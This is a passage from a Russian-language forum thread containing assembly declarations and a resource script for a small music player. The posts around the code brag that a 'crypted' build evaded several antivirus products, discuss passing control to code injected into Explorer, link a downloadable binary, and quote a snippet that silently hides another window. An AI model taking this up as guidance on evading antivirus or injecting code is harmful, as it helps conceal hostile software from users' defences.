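SetColor    PROTO :HDC, :COLORREF, :COLORREF
TextScr     PROTO :DWORD, :DWORD
Rand15      proto :DWORD

STRSIZE     equ 35

.const
; ---- dialog and control ids (must match rsrc.rc) ----
DIALOG      equ 1
STATIC1     equ 3
STATIC2     equ 4
IMAGE       equ 5
LOAD        equ 6
EXIT        equ 9
START       equ 10
PAUSE1      equ 11
VOLUME      equ 12
STOP        equ 16
MAXSIZE     equ 260                 ; length passed to GetOpenFileName for Path
SLIDER      equ 19
MINIMIZE    equ 20
FrecAdd     equ 22
FrecSub     equ 23
Freq        equ 26
Key         equ 27

.data
ErrorC      db "ERROR!", 0
AppName     db "MiNi PLAYER", 0
ScrollStr   DWORD 100 dup (0)       ; 400-byte scroll text buffer
fName       DWORD 50 dup (0)        ; 200-byte track name buffer
number      dd 0                    ; scroll position of ScrollStr
_numb       dd 0                    ; scroll position of fName

; open-file dialog filter: display string / pattern pairs, double-NUL terminated
Filter      db "All Files (*.*)", 0, "*.bin;*.xm;*.it;*.mod;*.mid;*.rmi;*.sgt;*.fsb;*.s3m;*.wav;*.mp2;*.mp3;*.ogg;*.raw", 0
            db "Fast Tracker Sound (*.bin)", 0, "*.bin", 0
            db "Fast Tracker Sound (*.xm)", 0, "*.xm", 0
            db "Impulse Tracker (*.it)", 0, "*.it", 0
            db "Pro Tracker Modules (*.mod)", 0, "*.mod", 0
            db "MiDi Files (*.mid, *.rmi)", 0, "*.mid;*.rmi", 0
            db "DirectMusic segment files (*.sgt)", 0, "*.sgt", 0
            db "FMOD Sample Bank files (*.fsb)", 0, "*.fsb", 0
            db "ScreamTracker Modules (*.s3m)", 0, "*.s3m", 0
            db "Wave Audio files (*.wav)", 0, "*.wav", 0
            db "Mpeg 2 Layer (*.mp2)", 0, "*.mp2", 0
            db "Mpeg 3 Layer (*.mp3)", 0, "*.mp3", 0
            db "OGG Vorbis Decoder (*.ogg)", 0, "*.ogg", 0
            db "RAW files (*.raw)", 0, "*.raw", 0, 0

TitleCaption db "Select Sound File...",0
Path        DWORD (MAXSIZE/4) dup (0)   ; MAXSIZE bytes, so nMaxFile = MAXSIZE cannot overrun it
Space       db 47 dup (20h), 0          ; 47 blanks appended to scrolled strings
kb          db " KB", 0
TEMP        DWORD 64 dup (0)            ; 256 bytes, enough for the 0FFh-character reads
fTSize      db "File Size: ",0
fSize       DWORD 10 dup (0)            ; 40-byte scratch string for the size line
TrayName    DWORD 20 dup (0)            ; 80-byte tray tooltip text
result      REAL8 ?
counts      dd 16 dup(0)
hDlg        dd 0
msg         MSG <>
rc          RECT <>
sz          db 30 dup(0)
ctr         dd 0
r9Seed      dd ?
array       dd 100000 dup(?)

.data?
pKey        dd ?
hInstance   DWORD ?
hBrush      DWORD ?
hBkColor    DWORD ?
hIcon       DWORD ?
VOL         DWORD ?
Boolean     DWORD ?                 ; TRUE after STOP, cleared by START
len         DWORD ?
_len        DWORD ?
ModHandle   DWORD ?                 ; FMUSIC module or FSOUND sample handle
ModSound    DWORD ?                 ; TRUE = ModHandle is a module, FALSE = a sample
SoundF      DWORD ?                 ; current playback frequency
startupinfo STARTUPINFO <>
ofn         OPENFILENAME <>
note        NOTIFYICONDATA <>
pi          PROCESS_INFORMATION <>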
rsrc.rc

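// Resource script of the player: control ids, icon/bitmap/manifest/text
// resources, the dialog template and the version block.
// Change against the posted version: the version key "FileDescription" is
// spelled in ASCII; on the page it contained Cyrillic look-alike letters, so
// the value would not be found under the standard key.

// ---- control ids (must match data.inc) ----
#define DIALOG   1
#define STATIC2  4
#define IMAGE    5
#define LOAD     6
#define EXIT     9
#define START    10
#define PAUSE1   11
#define STOP     16
#define SLIDER   19
#define MINIMIZE 20
#define FrecAdd  22
#define FrecSub  23
#define Freq     26
#define Key      27

// ---- resources ----
1  ICON   DISCARDABLE "MAN.ico"
5  BITMAP DISCARDABLE "am.bmp"
7  BITMAP DISCARDABLE "load.bmp"
8  BITMAP DISCARDABLE "exit.bmp"
10 BITMAP DISCARDABLE "play.bmp"
11 BITMAP DISCARDABLE "pause.bmp"
15 BITMAP DISCARDABLE "stop.bmp"
1  24     DISCARDABLE "MANIFEST.xml"        // type 24 = manifest
18 RCDATA DISCARDABLE "scroll_text.txt"     // text shown by the scroller
21 BITMAP DISCARDABLE "minimize.bmp"
24 BITMAP DISCARDABLE "add.bmp"
25 BITMAP DISCARDABLE "sub.bmp"
27 BITMAP DISCARDABLE "set.bmp"

// ---- main dialog ----
DIALOG DIALOGEX 0,0,131,164
FONT 8,"MS Sans Serif",0,0,204
STYLE 0x90000800
EXSTYLE 0x00000008
BEGIN
    CONTROL "",STATIC2,"Static",0x50000001,3,25,124,9,0x00000000
    CONTROL "",IMAGE,"Button",0x50018080,5,61,121,82, 0x00010000
    CONTROL "",LOAD,"Button",0x50018080,4,38,11,11,0x00010000
    CONTROL "",EXIT,"Button",0x50018080,117,3,11,11,0x00010000
    CONTROL "",START,"Button",0x50018080,18,38,11,11,0x00010000
    CONTROL "",PAUSE1,"Button",0x50018080,32,38,11,11,0x00010000
    CONTROL "",STOP,"Button",0x50018080,46,38,11,11,0x00010000
    CONTROL "",SLIDER,"msctls_trackbar32",0x50010018,1,51,129,10,0x00000000
    CONTROL "",MINIMIZE,"Button",0x50018080,103,3,11,11,0x00010000
    CONTROL "",FrecAdd,"Button",0x50018080,74,38,11,11,0x00010000
    CONTROL "",FrecSub,"Button",0x50018080,60,38,11,11,0x00010000
    CONTROL "",Freq,"Static",0x50000001,88,39,37,10,0x00000000
    CONTROL "",Key,"Button",0x50018080,41,148,50,11,0x00010000
END

// ---- version information (self-declared strings) ----
1 VERSIONINFO
FILEVERSION 3,1,0,0
PRODUCTVERSION 3,1,0,0
FILEOS 0x00000004
FILETYPE 0x00000001
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "040904E4"
        BEGIN
            VALUE "CompanyName", "FreeCX+AmnesiaFaust\0"
            VALUE "FileDescription", "Mini-player\0"
            VALUE "OriginalFilename", "MUSiC\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation",0x0409, 0x04e4
    END
END
; Не корысти ради,а исключительно только любопытства для,тестировалось на :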
Avira AntiVir Personal SpyBotSD Dr.WebCureIT Kaspersky Avast AVZ
И некоторых других Анти-Вирусных хищниках
; (Все продукты имели актуальные движки и обновлённые базы сигнатур)
; Нам даже страшно говорить о результатах.ПОЗОР АНТИВИРУСНОЙ ИНДУСТРИИ!!!
; Удачи,Любви,Благополучия и Неимоверных Творческих Успехов !!!
; Пускай вам всем по - жизни светит только зелёный свет !!!
; P.S. А наши,- всё равно победят ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ;[sm=db.gif][sm=ba.gif]
Post #: 6
RE: BSOD - 2012-02-12 21:05:34.010000   
Flint_ta

Что-то я не понял, как вы там в проводнике поток создаёте. Точнее, как передаётся управление на внедрённый код?
Post #: 7
RE: BSOD - 2012-02-12 22:33:01.900000   
Elisaveta

Управление передаётся на пламенный msg привет "PikA-Bello!"

Запустите под хрюшкой закриптованый SmallPlayer_Mod,повремените чуть-чуть,
если нажмёте правую кнопку мышки-загрызушкина на мой компьютер,увидите -> передаётся управление на msg код или нет.[sm=db.gif]

Post #: 8
RE: BSOD - 2012-02-13 00:02:45.320000   
Flint_ta

не канпилится )) нету у нас таких инклудов
include fmod.inc includelib fmod.lib довайте готовый exe
Post #: 9
RE: BSOD - 2012-02-14 06:50:40.920000   
Elisaveta

Ничего что на депозит?

MMX:
Ребята,посмотрите пожалуйста на наше творчество.
Возможно,вам будет что-нибудь интересно.Хотите побольше юмора и Хардкора?
===============================================================

А плеер с дополнениями весит чуть больше 60kb[sm=dv.gif]


http://depositMUSICfiles.com/files/9jy90oztf

dep__ositfiles.com/files/9jy90oztf


eLISA:
Заранее прошу прощения за ошибки и неточности.Ненужное закомментировать.
Ведь я ещё только учусь и развиваюсь…[sm=ba.gif]

Электронная подпись.
08b6509d828f7507168144e008887f27c7cce232 *Cool.elisaveta-amnesia.txt [sm=aj.gif]
Post #: 10
RE: BSOD - 2012-02-14 11:16:21.793333   
Flint_ta

quote:

Запустите под хрюшкой закриптованый SmallPlayer_Mod,повремените чуть-чуть,
если нажмёте правую кнопку мышки-загрызушкина на мой компьютер,увидите -&gt; передаётся управление на msg код или нет.

По нажатию на кнопку пуск активируется. В общем теперь все ясно.

А вот это интересно )
; Fragment quoted from the listing: look up the window under a fixed screen
; point and hide it with a fade.
; NOTE(review): AnimateWindow fails when the calling thread does not own the
; window, so presumably this runs inside the process that owns it - confirm
; against the full listing. A window vanishing without user action is the
; visible symptom to correlate with this code.
HIDE_POINT_X    equ 314                 ; screen x of the probed point
HIDE_POINT_Y    equ 256                 ; screen y of the probed point
HIDE_DURATION   equ 1793                ; animation time in milliseconds

    push    HIDE_POINT_Y                ; POINT is passed by value: y is pushed first,
    push    HIDE_POINT_X                ;   then x
    call    WindowFromPoint             ; eax = handle of the window containing the point
    push    AW_HIDE or AW_BLEND         ; hide, using a fade effect
    push    HIDE_DURATION
    push    eax                         ; window returned above
    call    AnimateWindow
Post #: 11
RE: BSOD - 2012-02-17 06:13:10.590000   
AmnesiaMMX

Я очень долго думал.Сомневался.
Post #: 12
RE: BSOD - 2012-02-17 06:14:21.143333   
AmnesiaMMX

Взвешивал все "ЗА" и "ПРОТИВ".
Post #: 13
RE: BSOD - 2012-02-17 06:18:33.326666   
AmnesiaMMX

А потом решил…
Post #: 14
RE: BSOD - 2012-02-17 06:19:52.556666   
AmnesiaMMX

Что жена - лучше чем собака!:D
Post #: 15

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.